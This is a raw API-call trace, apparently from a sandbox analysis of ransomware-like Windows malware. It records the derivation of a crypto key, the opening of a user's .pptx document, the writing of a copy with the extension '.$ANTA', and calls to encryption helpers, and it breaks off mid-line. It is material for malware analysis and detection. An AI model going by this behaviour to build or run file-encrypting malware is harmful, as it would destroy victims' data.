RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43ca4f0 [0076.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca4f0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.959] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac180, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac700) returned 1 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0076.960] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0076.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0076.962] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0076.962] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.962] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796ea8 [0076.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.963] CryptDestroyHash (hHash=0x41ac180) returned 1 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0076.963] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0076.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0076.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0076.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0076.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0076.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0076.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0076.964] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\LI-IwwMLWnmp-I.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\li-iwwmlwnmp-i.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0076.964] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.964] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0076.965] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0076.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0076.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0076.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.965] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\LI-IwwMLWnmp-I.pptx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\li-iwwmlwnmp-i.pptx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0076.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0076.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.966] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0076.966] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0076.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.969] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0076.969] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x6f55, lpOverlapped=0x0) returned 1 [0076.971] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0076.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0076.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e06020 | out: hHeap=0x1780000) returned 1 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.974] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.974] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.974] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0076.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.975] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.975] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.976] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.976] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", 